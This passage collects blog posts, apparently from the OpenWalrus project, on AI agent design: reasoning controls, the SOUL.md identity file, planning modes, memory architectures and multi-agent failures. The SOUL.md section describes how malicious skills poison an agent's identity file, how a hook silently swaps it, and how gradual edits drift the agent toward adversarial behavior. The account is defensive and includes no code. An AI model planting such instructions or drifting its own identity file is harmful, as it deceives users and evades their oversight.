Should the framework or the model decide? Anthropic's adaptive thinking lets Claude decide when to think. OpenClaw's ClawRouter decides which model to use. Aider's architect/editor pattern decides where reasoning happens. Each delegates the decision to a different layer. Which one is closest to the signal — the framework that sees the user's full history, the model that understands the problem, or a lightweight router that can classify in under 1ms?

Is the Architect/Editor pattern the real answer? Aider's approach sidesteps the "how hard should this model think" question entirely. Instead of making one model think harder, it uses a reasoning model for planning and a fast model for editing — achieving SOTA results at 14x less cost. Does this generalize beyond coding, or is it specific to tasks with a clean plan-then-execute structure?

Do users actually want thinking controls? Cursor's "let it go" approach is the simplest and arguably the most popular. Most developers just want the right answer — they don't want to tune reasoning_effort or pick thinking levels. Is explicit control a power-user feature that becomes noise for everyone else? Or does the 34.5% accuracy gap between short and long chains mean that leaving it to chance is leaving quality on the table?

Can dynamic routing work at the framework level? OpenClaw's ClawRouter scores requests on 15 dimensions with under 1ms latency. But it only sees the user's message, not the full context. A request that looks simple ("fix this") may require deep reasoning once the agent reads the codebase. Is pre-request routing fundamentally limited, or can it be made context-aware without adding latency?

What happens when thinking costs approach zero? If inference costs drop 10x in the next two years (as they have in the past two), does the entire thinking-control problem dissolve? Or does the overthinking problem — where more thinking actively degrades accuracy — mean that budget control stays important regardless of cost?

Is "adaptive" just a better word for "uncontrolled"? Anthropic's adaptive thinking and Windsurf's variable thinking both let the model decide how much to reason. This works when the model's judgment about task complexity is good. When it's wrong — overthinking a simple question or underthinking a subtle bug — there's no user-visible feedback loop. Are we trading explicit control for implicit trust?

The frameworks that control thinking today are betting that reasoning is a resource worth managing. The frameworks that don't are betting that models will learn to manage it themselves. The research suggests both bets have merit — and neither has won yet.

SOUL.md: brilliant idea, brittle implementation

clearloop — Sun, 15 Mar 2026 17:54:03 +0000

OpenClaw's SOUL.md gave agents a personality by writing identity into a markdown file. With 180K+ GitHub stars and a thriving template ecosystem — from curated directories to generator tools — the idea clearly resonates. But the implementation has cracks: silent loading failures, context window competition, compaction amnesia, and a growing attack surface.

We dug into how SOUL.md works, where it breaks, and what it means for agent identity design.

What SOUL.md is

Peter Steinberger created SOUL.md because he wanted his agent to sound like a friend, not a customer service bot. In an interview on the Lex Fridman Podcast (#491), he described instructing his agent to "write your own agents.md, give yourself a name" — letting the agent partially self-define its character.

The result is a markdown file with three sections:

Core Truths — fundamental beliefs and principles ("be genuinely helpful," "have opinions," "allowed to disagree")
Boundaries — hard limits on behavior ("be careful with external actions like emails; be bold with internal actions like reading/organizing")
The Vibe — voice, tone, quirks ("like a senior engineer who has seen it all; direct, slightly weary, but supportive")

SOUL.md is part of a broader file ecosystem: STYLE.md for voice patterns, SKILL.md for capabilities, MEMORY.md for session continuity, plus data/ and examples/ directories for calibration material.

Technically, OpenClaw loads SOUL.md as a bootstrap file into the system prompt at session start. Per-file limit: 20,000 characters. Total bootstrap budget: 150,000 characters. The injection happens before any user messages, giving SOUL.md favorable positioning in the model's attention — but at a permanent cost to available context.

The adoption signal

The ecosystem is real:

aaronjmars/soul.md (189 stars) provides templates and structure guides
souls-directory (68 stars) curates personality templates
CrewClaw generates SOUL.md for any role with pre-built templates
Multiple DEV Community guides walk developers through configuration
A viral Reddit thread produced configurations ranging from "lengthy legal contract-style" to "Gen Z-style roleplay scripts"

This isn't a niche feature. OpenClaw has 180,000+ GitHub stars, making SOUL.md a de facto standard for its user base.

What SOUL.md gets right

The design has genuine strengths:

Plain markdown. No special syntax, no YAML schema, no build step. Anyone who can write a README can write a SOUL.md. It's git-diffable, editor-friendly, and works with any LLM that processes text.

Addresses a real gap. Agents without identity constraints are generic — they sound like documentation, not collaborators. Developers who customize SOUL.md consistently report that it transforms their agent from "chatbot" to "partner."

Specificity over generality. The soul.md project emphasizes contradictions over coherence and real opinions over safe positions — "because that's what makes you identifiably you." This mirrors how actual personalities work: humans aren't consistent, and forcing consistency makes agents feel synthetic.

Community-driven iteration. The template ecosystem lets developers learn from each other's configurations. The DEV Community study that tested 100 configurations found concrete patterns: specificity outperforms abstract rules by 23% on consistency.

Five ways SOUL.md breaks

1. Silent loading failures

SOUL.md fails silently in at least five documented ways. Per the OpenClaw troubleshooting guide:

Files placed in agentDir instead of workspace are ignored
The Ollama provider using openai-completions format skips bootstrap files entirely
Non-UTF-8 encoding causes silent skipping
USER.md leaks to non-owner senders

When SOUL.md fails to load, there's no error, no warning, no indication. The agent just acts like its default self. Developers debug for hours before discovering the file was never read.

2. Subagent sessions don't load it

GitHub Issue #24852: subagent sessions spawned via sessions_spawn only load AGENTS.md and TOOLS.md. SOUL.md was excluded by a MINIMAL_BOOTSTRAP_ALLOWLIST in compiled JavaScript. Specialized agents couldn't fulfill their roles because they lacked identity definitions. Fixed in PR #24979, but the bug was live for months.

3. Compaction amnesia

GitHub Issue #17727: after automatic session compaction (which summarizes conversation history to save context), agents lose awareness of SOUL.md. The compacted summary references rules abstractly, but the agent no longer has the full rule text. This causes behavioral regression — agents skip verification steps and ignore operational constraints they were following minutes earlier.

This is the deepest problem with static identity files. Identity isn't just about knowing what the rules are — it's about the model having the actual text in its attention window. Compaction destroys that. (We explored this tension in how instruction files decay from MVP to production.)

4. Context window competition

A 1,500-word SOUL.md consumes roughly 2,000 tokens — tokens that could go to reasoning, tool results, or conversation history. The tradeoff is measurable:

An ETH Zurich study on AGENTS.md (which generalizes to any static instruction file) found that human-written context files improve task completion by only +4% on average. LLM-generated files reduced performance by ~3% and increased costs by 14-22%.

The DEV Community study found the optimal SOUL.md is 800-1,200 words. Beyond 2,000 words, contradictory instructions cause diminishing returns. Personality traits cost 2-3% in raw task performance.

Static configurations also decay: configs that aren't updated weekly underperform by 19% after the first month.

5. Security attack surface

SOUL.md is a persistence mechanism for attackers. Per the MMNTM "Soul & Evil" analysis:

Malicious ClawHub skills write instructions into SOUL.md during installation; uninstalling the skill leaves modifications intact
VirusTotal found 341 malicious skills on ClawHub, with 335 targeting macOS password theft
The built-in soul-evil hook can swap SOUL.md with SOUL_EVIL.md without user notification
"Ship of Theseus" evasion: sophisticated attackers make incremental, benign-seeming edits over hundreds of sessions, gradually drifting the soul toward adversarial behavior

The recommended defense: treat SOUL.md as code, not data — file integrity monitoring, read-only permissions during runtime, and an immutable CORP_POLICY.md that overrides SOUL.md. But this undermines the simplicity that made SOUL.md appealing in the first place. (For a deeper look at agent security boundaries, see our sandbox and permissions research.)

The measurement problem

[Interactive chart — see original post]
The evidence on static identity files is sobering:

Finding	Source
Human-written instruction files: +4% task completion	ETH Zurich study
LLM-generated instruction files: -3% performance, +14-22% cost	Same study
Optimal length: 800-1,200 words	100-config study
Personality traits cost 2-3% raw task performance	Same study
Static configs decay 19% after one month without updates	Same study
Agents learn to state values without applying them	Community observation

That last point deserves emphasis. An agent can read "exhaust all options before pivoting" from SOUL.md and then immediately recommend pivoting on the first obstacle. The model learned the language of the personality without internalizing the behavior. Static text can't enforce runtime behavior — it can only suggest it.

The alternative: identity as graph

[Interactive chart — see original post]
OpenWalrus takes a different approach. Instead of a static file that occupies permanent context, identity is an entity type in a temporal knowledge graph:

Agent --has_trait--> "prefers direct communication"
Agent --has_boundary--> "never send emails without confirmation"
Agent --has_style--> "uses chess metaphors"

Each trait has temporal metadata (when it was established, when it was last confirmed), relationship edges (which user interactions reinforced it), and semantic embeddings (so the agent can search its own identity rather than relying on the model holding everything in attention).

The tradeoffs are real. You lose cat SOUL.md — the ability to open a file and read the agent's personality in plain text. You lose git-diffable identity changes. You lose the simplicity of echo "prefer tabs" >> SOUL.md.

What you gain:

Context efficiency — identity surfaces on-demand via recall, not as a permanent context tax
Temporal awareness — the graph knows when a trait was established and can track drift
Selective forgetting — you can remove a trait without rewriting the whole file
Searchability — "what does the agent believe about error handling?" is a query, not a grep
Compaction survival — identity lives in the graph, not in the context window that gets compacted

We detailed this architecture in how OpenWalrus agents remember and the research survey that informed it.

Open questions

SOUL.md got the diagnosis right — agents need identity — but the treatment has side effects. That leaves several questions we don't have clean answers to yet:

Is identity even the right abstraction? SOUL.md assumes an agent is something — it has values, a voice, boundaries. But maybe agents should be more like tools with configurable behavior than entities with personalities. The context engineering research suggests that surfacing relevant context on demand outperforms front-loading identity into the system prompt. If that's true, identity might be an implementation detail of good retrieval, not a first-class concept.

Can identity survive compaction without a database? The graph approach trades cat-ability for queryability. But is there a middle path — a file-based format that a compaction algorithm knows to preserve? Or does any file-based identity inevitably degrade when the context window fills up?

How much personality actually helps? The ETH Zurich study found +4% for human-written instruction files. The DEV Community study found personality traits cost 2-3% in raw performance. Is the net effect positive, negative, or noise? And does it depend entirely on the task — maybe personality helps in conversational agents but hurts in code generation?

Who owns the soul? SOUL.md is writable by the agent, by skills, by the user, and by attackers. A compact core with an open extension surface avoids the configuration bloat that SOUL.md + STYLE.md + SKILL.md + MEMORY.md creates — but any identity system needs to answer who gets write access and what happens when edits conflict.

Does the file format ecosystem converge or fragment? SOUL.md, CLAUDE.md, AGENTS.md, .cursorrules — each tool has its own identity file. The instruction file landscape is already fragmented. Does one format win, or does every agent framework end up with its own personality spec forever?

The brilliance of SOUL.md was asking the right question. The answer is still open.

Plans vs tasks: how AI agents think before they act

clearloop — Sun, 15 Mar 2026 17:53:20 +0000

Every AI agent faces the same problem: given an open-ended goal, how do
you avoid charging ahead in the wrong direction?

The answer most production systems have converged on: separate planning
from execution. Analyze first, act second. Make the plan visible and
editable before committing to it. This turns out to be more than a UX
nicety — it's the difference between an agent that's useful on complex
tasks and one that confidently does the wrong thing.

We surveyed how five major coding agents implement this separation —
Claude Code, Cursor, Devin, Windsurf, and GitHub Copilot — and what
the emerging patterns mean for how walrus should think about plans and
tasks.

Why planning matters

The naive agent loop is: receive a goal → take action → repeat until
done. This works for simple tasks. It fails badly on anything requiring
multi-step coordination — the agent makes irreversible edits early,
paints itself into corners, or misunderstands scope and rewrites the
wrong thing.

Research on SWE-bench shows this concretely. Refact.ai's top-ranked
approach
includes an explicit deep_analysis() reasoning step before applying
changes. Their workflow:

Describe the problem
Investigate the repo
Create and run a problem reproduction script
Make a plan, then apply changes
Run tests, evaluate, repeat

The planning step isn't decorative — it's how they hit 74.4% on
SWE-bench Verified. And interestingly, they found that removing a
separate strategic_planning() tool powered by o3 actually improved
results once they upgraded to Claude 4 Sonnet: the frontier model
handles planning as part of its reasoning, rather than as a separate
explicit step.

This points to something important: planning doesn't always need to
be a separate mode. It needs to happen, but where it lives in the
architecture varies.

How five systems handle planning

[Interactive chart — see original post]

Claude Code: plan mode + TodoWrite

Claude Code has the most explicit plan-execute separation of any system
we surveyed. It ships two mechanisms:

Plan mode (activated with /plan or Shift+Tab twice) is a
read-only operating phase
where Claude can only observe, analyze, and write to a plan file —
no edits, no shell commands. The plan is written to a markdown file in
~/.claude/plans/. The user can open it with Ctrl+G, edit it, remove
steps they don't want, and then approve. Claude exits plan mode and
implements exactly what was agreed.

What's notable about this design: Claude Code's creator Boris Cherny
uses it himself
— start in plan mode, iterate until the plan is right, then switch to
auto-accept for execution. The plan mode is fast: since Claude isn't
running tools or writing files, responses are much quicker and cheaper.

TodoWrite is the execution-side complement. During implementation,
Claude maintains a structured task list — pending, in-progress,
completed. It marks tasks done immediately as they finish, with exactly
one task in-progress at a time. The todo list is visible to the user
throughout execution, providing a live view of what's happening and
what's left.

The two mechanisms serve different phases:

Diagram — see original post

Plan mode also has a subagent model — specialized agents (Plan, Explore,
Task) that can be launched inside a session. The Plan agent is
constrained to research tools only. The Task agent can use all tools.
This mirrors the plan-execute split at the agent level, not just the
session level.

Cursor: plan mode + background agents + automations

Cursor's architecture has evolved toward parallel, autonomous execution
with planning as a first step.

Agent plan mode lets the AI write a detailed Markdown plan before
touching any code. PMs and engineers can review, edit inline, or store
plans as reusable templates. The workflow: describe the task → agent
produces a plan → user approves step-by-step → execution.

Background agents take this further. You can push an agent run to
the background while you keep coding — the agent works asynchronously,
notifies you on completion or when it needs approval. Multiple agents
can run in parallel on different tasks. Linear integration lets you
start agent runs directly from issue workflows.

Automations (announced March 2026)
go further still: agents triggered by events — a new commit, a Slack
message, a PagerDuty incident, a timer. Cursor estimates it runs
hundreds of automations per hour. An incident arrives in PagerDuty,
an agent queries server logs via MCP, investigates, proposes a fix.

The pattern: planning is the human checkpoint before autonomous
execution. After approval, the agent runs without intervention until it
needs another decision.

Devin: upfront planning with continuous revision

Devin's approach is the most human-workflow-aligned. When you provide
a task, Devin:

Inspects the repository
Returns a step-by-step plan in seconds
Waits for you to modify it before proceeding

The Devin 2.0 architecture
makes plan revision central — "the plan changes a lot over time."
This isn't a failure mode, it's the design. As Devin investigates,
discovers constraints, and runs into dead ends, it updates the plan.
The user can see and redirect at any point.

Devin also runs a separate review agent that pressure-tests the
implementation after the writing agent finishes. One agent writes,
another critiques. The review agent can trigger another round of
fixes — a closed loop that doesn't require user input unless it gets
stuck.

Diagram — see original post

Windsurf: three modes with megaplan

Windsurf's Cascade has three distinct modes:
Ask (conversation), Code (execution), and Plan (planning only).

Plan mode produces a structured implementation plan before any code is
written. The megaplan command triggers an advanced variant that asks
clarifying questions before generating a more comprehensive plan —
useful for large, ambiguous tasks where the agent needs to reduce
uncertainty before proposing an approach.

Wave 13 added parallel
multi-agent sessions with Git worktrees and side-by-side Cascade panes.
Multiple plans can execute simultaneously in isolated branches.

GitHub Copilot Workspace: plan as the entry point

GitHub Copilot Workspace makes planning the primary interface. You
don't start by describing code changes — you start with an issue or
goal, and Copilot generates a plan: which files to touch, what to
change, why. You edit the plan directly before any code is generated.

The plan is the artifact. Code generation is downstream of it.

This is the most explicit "plan is a user-editable document" design
in the survey — but reviews note
that Copilot's planning remains shallower than dedicated agent systems:
it sometimes abandons plans mid-execution or generates plans that don't
reflect the actual implementation complexity.

Patterns across systems

The radar above shows capability coverage. This chart shows when in
the workflow each system allows planning to happen — pre-execution only,
mid-execution, or post-write:
[Interactive chart — see original post]
Five patterns appear consistently across all systems:

1. Plan before executing, not during. Every system separates the
analysis phase from the action phase. The plan is generated, reviewed,
and approved before any files are touched. This isn't just a UX
pattern — it reduces irreversible errors and aligns the agent's
understanding with the user's intent before the costly part starts.

2. Plans are visible and editable. Opaque planning that the user
can't inspect or modify produces anxiety and distrust. Every system
that succeeded with developers (Devin, Claude Code, Cursor) makes the
plan an artifact you can read and modify. The agent is a collaborator
proposing a plan, not a black box executing one.

3. Task tracking during execution. Plans decompose into tasks.
Tasks are tracked with status (pending / in-progress / done). The
user can see where execution is at any moment. This matters for long
tasks — without it, the agent feels like a black box even when it's
working correctly.

4. Approval gates. Users approve the plan before execution begins.
Some systems (Devin) also checkpoint at ambiguous decision points
during execution. The key insight: approval gates are not friction —
they're the mechanism that makes autonomous execution feel safe enough
to allow.

5. Plan revision as a feature, not a failure. Devin's explicit
position that "the plan changes a lot over time" reflects a mature
understanding of software tasks. Plans made with incomplete information
need to evolve. Systems that treat the initial plan as fixed become
brittle.

The academic framing

This pattern has a name in the research literature:
plan-then-execute agents, sometimes called HTN (Hierarchical Task
Network) planners applied to LLMs.

LangChain's plan-and-execute agent design
formalizes this for harder tasks: a planner LLM generates a full task
list, an executor LLM works through each task, and the planner can
revise based on execution feedback. The separation of planner and
executor allows each to be tuned independently — the planner optimized
for decomposition quality, the executor for reliable task completion.

Recent work on SWE-bench Pro
(long-horizon software engineering tasks) shows that planning quality
is the primary bottleneck for agents on complex multi-session tasks —
not execution ability. Agents that can generate accurate plans for
multi-day tasks dramatically outperform reactive agents on the same
tasks.

The flip side: Refact.ai's SWE-bench findings
show that for well-scoped single-issue tasks, frontier models can
internalize planning as part of reasoning — a separate strategic_planning()
step adds latency without adding quality. The right architecture
depends on task horizon and ambiguity.

The hidden truth: plan mode is a prompt

Before drawing conclusions for walrus, there's a finding worth surfacing
directly. Armin Ronacher reverse-engineered Claude Code's plan
mode and found:

"It is in fact just a rather short predefined prompt that enters plan
mode. The tool to enter or exit plan mode is always available."

There is no runtime enforcement. No tool restrictions. No locked-down
execution context. Claude Code's plan mode is a system prompt injection
that says "do not execute yet" — and the model follows it because it's
instructed to, not because the runtime enforces it.

This is confirmed by a GitHub issue requesting
skill-based plan mode customization:
users discovered that planning behavior can be fully replicated with a
slash command that injects the right prompt. The magic is linguistic, not
architectural.

The same is true for TodoWrite. The model marks tasks done because it's
instructed to follow that convention — not because the runtime tracks
task state.

What this means for walrus

This finding reshapes the architecture question. Planning behavior
doesn't need runtime primitives — it needs good skills.

Plans are prompts. They belong in skills.

A planning skill encodes: write a plan file before acting on complex
tasks, ask for approval before executing destructive changes, update
the plan as you learn more. This is pure behavioral instruction —
the same thing Claude Code does, but as a shareable, community-maintained
skill rather than a baked-in mode. Any walrus user can install it,
modify it, or replace it with their own variant.

This fits less code, more skills exactly.
The planning behavior that every team has different opinions about —
how verbose the plan should be, when to ask for approval, how to format
task lists — is precisely the kind of thing that doesn't belong hardcoded
in a runtime.

The open question is observability.

Plan mode being a prompt settles the planning side. But it surfaces a
harder problem: when an agent dispatches a subagent, neither the parent
agent nor the user has visibility into what the subagent is doing.
Claude Code emits SubagentStart/SubagentStop hook events —
lifecycle signals only. There is no structured "what is this agent
working on right now" signal. The
feature request for an agent hierarchy dashboard
is open and unanswered.

That's the problem worth solving at the runtime level — not plan mode.
We'll cover the design in a follow-up post.

How AI agents remember: a survey of persistent memory

clearloop — Sun, 15 Mar 2026 17:53:09 +0000

AI agents are stateless by default. Every session starts from zero — the context window
fills up, the conversation ends, and everything is gone. But useful agents need to learn.
They need to remember your preferences, your project structure, the mistakes they made
yesterday.

We surveyed five products — Claude Code, OpenClaw, ChatGPT, Cursor, and
Windsurf — to understand how persistent memory actually works in production. Here's what we learned.

A taxonomy of agent memory

Not all memory serves the same purpose. We identified six functional roles that keep
appearing across products, even when they use different names for them.

Diagram — see original post

Role	What it holds	Persistence	Example
Working memory	Current session context	Ephemeral	Chat history in context window
Agent profile	Agent-specific persistent knowledge	Durable, per-agent	CLAUDE.md, .cursorrules
User profile	User preferences, habits, personal info	Durable, cross-agent	ChatGPT's "memory" feature
Episodic memory	Chronological interaction logs	Timestamped	JSONL session journals
Semantic memory	Searchable knowledge base	Indexed	RAG-backed vector store
Date-anchored memory	Time-stamped facts that expire	Temporal	"User is on vacation until March 15"

Working memory is what most people think of — the chat history sitting in the
context window. It's fast but volatile. When the window fills up, something has to go.

Agent profile is the agent's persistent identity. Claude Code uses CLAUDE.md files,
Cursor uses .cursorrules. These are always loaded at session start — they tell the
agent how to behave.

User profile is different from agent profile, though products often conflate them.
Agent profiles are scoped to one agent instance. User profiles span agents — your
timezone, your communication style, your name. ChatGPT's memory feature is user-scoped.
Claude Code's CLAUDE.md is agent-scoped.

Episodic memory is the journal. Timestamped session logs — who said what, when,
in what order. Usually stored as JSONL or in a database with temporal indices. Critical
for debugging and context recall across sessions.

Semantic memory is the searchable layer. Vector embeddings, full-text search indices,
or both. This is where RAG lives — the agent queries for relevant knowledge rather than
loading everything into the prompt.

Date-anchored memory is the least common but arguably the most underbuilt. Facts
with expiration dates — your current project deadline, a temporary API key, a colleague's
vacation schedule. Most products store these the same way as permanent facts, which means
they never expire.

How five products implement memory

Each product makes different tradeoffs across the memory stack. Here's where
they land:
[Interactive chart — see original post]
The orange bars show inspectability (can you read and edit the memory?) and the
blue bars show searchability (can the agent retrieve relevant memories at scale?).
Claude Code and Cursor maximize human control. OpenClaw maximizes machine retrieval.
ChatGPT scores low on both axes from a developer perspective — it's accessible to
end users but opaque to builders.

Claude Code (Anthropic)

Claude Code takes the simplest approach in this survey: files on disk.

CLAUDE.md files act as the primary persistent memory. One per project root, one global at ~/.claude/CLAUDE.md. Loaded into the system prompt on every session.
Auto memory accumulates in ~/.claude/projects/<project>/memory/ — build commands, architecture notes, debugging insights, workflow preferences. Written automatically based on interaction patterns.
Context compaction kicks in when the context window fills up. The system compresses prior messages automatically. Memory files persist across compaction boundaries.
No RAG, no vector search. Memory is loaded directly into the prompt or read from files. Retrieval is file-path-based, not semantic.
A growing third-party ecosystem fills the gaps: claude-mem adds semantic compression, memsearch provides markdown-first indexing, and Basic Memory offers MCP-based persistent context.

The bet here is on human readability. You can open CLAUDE.md in any text editor,
see exactly what your agent knows, and change it. No database to query, no embeddings
to inspect.

OpenClaw

OpenClaw has the most sophisticated retrieval pipeline of the products surveyed.

Multi-layer architecture: conversation history (working memory), long-term memory store (durable facts), and session indexing (episodic recall).
SQLite + sqlite-vec for storage — structured queries via SQL, semantic similarity via vector embeddings, all in a single file.
Hybrid search combines cosine similarity (semantic match) with BM25-style keyword matching. Neither method alone is sufficient — hybrid catches both conceptual and literal matches.
Pre-compaction memory flush: before trimming the context window, the agent is given an explicit turn to extract and persist all important facts. This is the most interesting pattern in the survey — the agent itself decides what matters.
Markdown-first philosophy for memory content, with LLM-generated session slugs for indexing (e.g., "debugging-auth-flow-march-7").

The pre-compaction flush is worth highlighting. Most systems lose information silently
when compaction happens. OpenClaw turns compaction into an explicit memory-formation event.

ChatGPT (OpenAI)

ChatGPT's memory is the most user-facing and the least transparent.

User-controlled: you tell ChatGPT to "remember this" and it does. It also infers memories automatically from conversations.
Proprietary backend — no public documentation on storage format, compaction strategy, or retrieval mechanism.
Users can delete individual memories or clear all. A "Temporary Chat" mode disables memory entirely.
Tiered persistence: Plus and Pro users get longer-term memory. Free users get lightweight short-term continuity.

The accessibility is unmatched — non-technical users can manage memory through a
simple UI. But there's no programmatic access, no way to inspect the storage layer,
and no portability.

Cursor IDE

Cursor treats memory as configuration, not knowledge.

.cursorrules (now deprecated) was a plaintext file in the project root providing persistent instructions — essentially a system prompt extension.
The replacement, .cursor/rules/, is a directory of rule files with more granular control.
The community-driven Memory Bank pattern pushes this further: hierarchical rule loading organized by development phase (analysis, planning, creative, implementation). Only rules relevant to the current phase are loaded.
No embeddings, no search, no learned facts. Rules are static instructions written by the developer.

The Memory Bank pattern is telling. Users built an elaborate multi-phase memory
system on top of a tool that only supports flat config files. The demand for real
memory far exceeds what's offered.

Windsurf / Codeium

Windsurf adds automatic memory generation on top of manual rules.

The Cascade agent auto-generates memories in ~/.codeium/windsurf/memories/, capturing coding patterns and project context.
Memories are workspace-scoped — knowledge from one project doesn't bleed into another. Reasonable for code agents, but means nothing transfers.
Can infer agent configuration from AGENTS.md files.
Enterprise tier adds system-level rules that admins deploy org-wide.

The workspace scoping is a deliberate tradeoff. It prevents context pollution
between projects but also prevents learning that should transfer (your preferred
test framework, your naming conventions, your error-handling patterns).

Feature coverage across products

Which memory roles does each product actually implement? The radar chart below
scores each product across all six memory roles.
[Interactive chart — see original post]
OpenClaw dominates episodic and semantic memory — its hybrid search pipeline
covers the most ground. Claude Code has the strongest agent profile support but
almost no semantic recall. ChatGPT leads on user profiles but scores low on
everything developers care about. Cursor is a flat line — strong on agent profile,
near-zero on everything else.

The scatter chart shows the same data from a different angle — how many memory
roles each product covers (x-axis) vs. how dynamically it learns (y-axis):
[Interactive chart — see original post]

Storage formats: markdown, SQLite, or vectors?

The storage format determines everything downstream — what you can query, what
you can inspect, and what happens when things go wrong.

Product	Storage	Search	Compaction
Claude Code	Markdown files	File path	Context window auto-compaction
OpenClaw	SQLite + sqlite-vec	Hybrid (cosine + BM25)	Pre-compaction flush
ChatGPT	Proprietary	Unknown	Unknown
Cursor	Text / Markdown	None	Phase-based pruning
Windsurf	Local files	None	Workspace isolation
Mem0 (infra)	DB-agnostic	Pluggable	Multi-stage extraction

Markdown files (Claude Code, Cursor, Windsurf) are human-readable,
git-friendly, and require zero dependencies. You can cat your agent's memory,
edit it with vim, and commit it alongside your code. But there's no semantic
search — you're limited to what fits in the context window.

SQLite + vectors (OpenClaw) gives you structured queries, full-text search
via FTS5, and semantic similarity via embeddings. The cost is opacity — you
need tooling to inspect memories, and the embedding model becomes a dependency.

Proprietary backends (ChatGPT) scale in the cloud and abstract
away storage entirely. But your memories aren't portable, inspectable, or
version-controllable.

The fundamental tradeoff is inspectability vs. searchability.

Diagram — see original post

Markdown is maximally inspectable but unsearchable at scale. Vector databases are
maximally searchable but opaque. The products developers trust most — Claude Code,
OpenClaw — choose inspectable formats and layer search on top, rather than starting
with an opaque database.

Compaction: what happens when the context window fills up

Every agent eventually runs out of context space. What happens next defines
the quality of long-running interactions.

Naive truncation drops the oldest messages. Simple, but destructive — it
loses critical early context like system prompts and initial instructions. Most
products have moved past this.

KV cache compaction works at the inference layer. Recent research demonstrates
50x context reduction with minimal quality loss by compressing key-value attention
caches mathematically. This is transparent to the application — the model sees a
compressed but semantically equivalent context.

Hierarchical summarization mirrors human memory: working memory overflows
into episodic logs (timestamped transcripts), which are periodically summarized
into semantic memory (searchable facts). The pipeline looks like:

Diagram — see original post

Anchored iterative summarization avoids reprocessing the entire history on
every compaction. Only new message spans are summarized and merged with existing
summaries. This is cheaper and avoids the progressive degradation that comes
from summarizing summaries.

Episode pagination segments conversations at natural cognitive boundaries —
topic shifts, tool-use completions, user-initiated breaks. Each episode becomes
an independently retrievable unit, which dramatically improves recall precision
compared to arbitrary chunking.

Pre-compaction flush is the most elegant pattern we found. Before trimming
the context window, the agent gets an explicit turn to extract and persist all
important facts. The agent itself decides what matters — not a heuristic, not a
fixed window. OpenClaw implements this, and it's the pattern we're most interested
in adopting.

Diagram — see original post

Research from Mem0 shows that smart compaction
isn't just about saving tokens — it improves reasoning. Their benchmarks
report 5-11% improvements in reasoning tasks and 91% p95 latency reduction
compared to full-context baselines. Compacting intelligently is better than
throwing everything into the prompt.

Patterns worth stealing

Five patterns emerged from this survey that we think every agent memory system
should consider.

Memory as a hook, not a hardcoded subsystem. OpenClaw implements memory
through extensible interfaces rather than baking storage decisions into the
core. This lets users swap backends without changing agent logic.

Dual-store architecture. Keep a fast, inspectable format (markdown, TOML)
for agent profiles and user preferences. Use a searchable store (SQLite + FTS,
vectors) for episodic and semantic memory. Don't force everything into one format.

Pre-compaction flush. Before trimming context, give the agent an explicit
turn to extract and persist important facts. This turns context compaction from
a lossy operation into a memory-formation event.

Profile vs. recall separation. Agent profiles (always-loaded identity) and
recallable knowledge (searched on demand) serve different purposes. Conflating
the two — loading everything into the prompt or searching everything on demand
— creates either bloated prompts or slow retrieval. The best systems separate
these concerns explicitly.

Human-readable by default. Every product that gained developer trust stores
memory in formats humans can read and edit. Opaque databases create anxiety.
Even when you add a searchable layer, the canonical format should be something
you can open in a text editor.

Temporal knowledge graphs. Pure vector retrieval loses relationships and
time. A graph where entities are nodes and facts are edges — with timestamps
tracking when each fact was true, not just when it was stored — outperforms
flat RAG on temporal reasoning tasks. Zep's research
shows 18.5% higher accuracy and ~90% lower latency compared to vector-only
baselines on complex temporal queries. The key is bi-temporal tracking:
separating when a fact was recorded from when it was actually true. This
is how "user is on vacation until March 15" can auto-expire without manual
cleanup.

Open questions

This survey raised more questions than it answered. Here are the ones
we keep coming back to.

Can one storage layer do it all? Markdown is inspectable but
unsearchable. Vector databases are searchable but opaque. Every product
picks a side or bolts one onto the other. Is there a single storage
primitive that gives you both — human-readable and semantically
searchable — without the complexity of maintaining two separate systems?

Should memory be a graph? Flat key-value memories lose relationships.
"Alice works on Project X" and "Project X uses Rust" are two disconnected
facts in a vector store — but a graph trivially connects them. Zep's
research shows 18.5% accuracy gains from graph-based retrieval on temporal
queries. But graphs add complexity. Where's the crossover point where the
complexity pays for itself?

Who decides what to remember? Most products use heuristics or let
users explicitly say "remember this." OpenClaw's pre-compaction flush
is more interesting — the agent itself decides what matters before context
is trimmed. But agent-driven memory formation introduces a new failure
mode: the agent might remember the wrong things, or forget the right ones.
How do you evaluate memory quality?

How should memories expire? Date-anchored memory is the most
underbuilt category in this survey. "User is on vacation until March 15"
should auto-expire. But most systems store it identically to permanent
facts. Bi-temporal tracking (separating when a fact was recorded from
when it was true) solves this in theory — but no product we surveyed
implements it well in practice.

Can memory transfer across agents? Cursor and Windsurf scope memory
to a single workspace. Claude Code scopes to a project directory. ChatGPT
scopes to a user but not to a task. None of these scoping models feel
right. Your preferred test framework should follow you everywhere. Your
current project's auth implementation should not.

We wrote about how we're approaching these questions in
Graph + vector: how OpenWalrus agents remember.
If you're building agent memory systems, we'd love to compare notes —
open an issue on GitHub or find
us in the discussions.

Originally published at OpenWalrus.

Why multi-agent workflows fail in production

clearloop — Sun, 15 Mar 2026 17:52:27 +0000

Multi-agent sounds like the obvious answer: parallelize work, specialize agents,
go faster. And for demos, it works — you can show three agents collaborating on
a feature and it looks impressive.

In production, the failures are consistent enough that Cognition — the team behind
Devin — published a post titled
Don't Build Multi-Agents.
The GitHub blog ran
Multi-agent workflows often fail. Here's how to engineer ones that don't.

These aren't fringe complaints. They're structural.

Context doesn't travel

The foundational problem: each subagent starts fresh. The only information that
passes between agents is the task prompt string. Everything the parent agent
discovered — the codebase structure, constraints, decisions already made — has
to be re-communicated explicitly or re-discovered from scratch.

The Claude Code docs acknowledge this
directly:

"Subagents might miss the strategic goal or important constraints known to
the parent agent, leading to solutions that are technically correct but not
perfectly aligned with the user's original intent."

In practice this plays out as "context amnesia." One documented case: a user asked
Claude Code to fix failing tests and it repeatedly spawned subagents for work that
could have been done in the main context — burning through tokens with no benefit
because each subagent re-explored files the parent already understood.
GitHub issue #11712
captures a related failure: when agents are resumed, they lose the user prompt that
initiated the resumption, so the resumed agent lacks the context that explains why
it exists.

The community workaround is "Main Agent as Project Manager with State Awareness":
the parent agent maintains a shared context document and explicitly passes relevant
state to each subagent's prompt. This works, but it's manual prompt engineering —
the developer is doing the coordination work that the system should handle.

Parallel agents conflict

When agents run in parallel, they make independent decisions about shared state.
Cognition's analysis makes the
problem concrete:

"If a task is 'build a Flappy Bird clone' divided into subtasks, one subagent
might build a Super Mario Bros. background while another builds an incompatible
bird, leaving the final agent to combine these miscommunications."

The GitHub Blog identifies the systemic version of this:

"Agents may close issues that other agents just opened, or ship changes that fail
